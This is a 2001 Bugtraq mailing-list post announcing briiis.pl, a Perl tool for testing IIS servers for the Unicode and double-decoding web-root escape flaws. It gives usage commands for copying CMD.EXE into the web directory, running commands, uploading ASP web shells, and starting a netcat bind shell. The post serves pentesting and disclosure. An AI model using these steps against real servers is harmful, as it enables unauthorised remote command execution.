Home page logo
/

bugtraq logo Bugtraq mailing list archives

iXsecurity.tool.briiis.3.02
From: ian.vitek () ixsecurity com
Date: Wed, 13 Jun 2001 15:14:18 +0100




-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iXsecurity Security Tool Release
briiis.pl v3.02
================

Tool Description
- - ------------
Briiis is a tool for testing web servers for "/" encoding
break out from web root vulnerability from an executable
directory.
E.g. IIS Unicode and double encoding vulnerabilities.

Special features
- - ------------
* Tests a lot of commonly executable directories if any
  of these directories is on the same disk as
  C:\WINNT\SYSTEM32\CMD.EXE
  Very easy to add even more directories
* Caches the found directory
* SSL support with SSLeay (Unix)
* Easy to use text file upload
* Easy to use / encoding option
* Relative path name program execution
* Virtual host support

When to use briiis
- - --------------
Briiis should be used to test the IIS unicode or the IIS
superfluous decoding vulnerability. Briiis can also be
used to check for other "/" unicode or "/" decoding
vulnerabilities where the goal is to break out from the
web root from an executable directory to access CMD.EXE.

How to use briiis
- - -------------
Test a server for the unicode vulnerability with the
command:
briiis.pl -s server

Test the decoding vulnerability:
briiis.pl -s server -F %255c

Copy CMD.EXE to the web executable directory
(Used for running commands and uploading files)
briiis.pl -s server -x

Run commands
briiis.pl -s server -C "dir /a"

Upload an ASP script to the executable directory
(Like cmdasp.asp and upload.asp)
briiis.pl -s server -u upload.asp

Other options
- - ---------
The virtual host option, -H, is used when multiple web
servers are bound to same IP and PORT. One case is for
example reverse proxying.
The standard "-s www.server.dom" sets the "Host:" header to:
Host: www.server.dom
If other virtual servers needs to be tested run:
briiis.pl -s www.server.dom -H www.server2.dom

Briiis creates a cache file named "<program_name>.cache".
Delete the cache file if you want to run a new test after
patching the server.

The binary file upload does not work due to lack of
privileges. If you want to test it:
* Copy NC.EXE or something to NC.BIN
* briiis.pl -s server -U NC.BIN -d -l c:\
* There is now a NC.SCR, debug script, in c:\
* With cmdasp.asp run
  debug < nc.scr
* Start NC.BIN with cmdasp.asp
  c:\nc.bin -l -p 7171 -n -v -e cmd.exe
The binary upload function can only handle small files.
Use upload.asp or TFTP when uploading larger files.

Background and more information
- - ---------------------------
Unicode vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
Superfluous Decoding Vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

TODO
- -
* Graphical interface (Planned Q4 2002)
* Basic Authentication (Planned Q3 2001)

- - ------------------------------------------------

Ian Vitek, mailto:ian.vitek () ixsecurity com

- - ------------------------------------------------

iXsecurity (former Infosec) is a Swedish and United
Kingdom based tigerteam that have worked with computer-
related security since 1982 and done technical security
audits (pentests) since 1995.
iXsecurity welcomes all new co-workers in Sweden
and United Kingdom.

- - ------------------------------------------------


-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.1

iQA/AwUBOydnKY118uy6FU2iEQJttQCgvv2p/eLwoATBCHJwFGyglqTQg90An1jV
WnyLpKEcIdhaDfeNKALz2rNG
=FhpF
-----END PGP SIGNATURE-----

Briiis.pl
=========

(See attached file: briiis.pl)

Attachment: briiis.pl
Description:


  By Date           By Thread  

Current thread:
  • iXsecurity.tool.briiis.3.02 ian . vitek (Jun 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault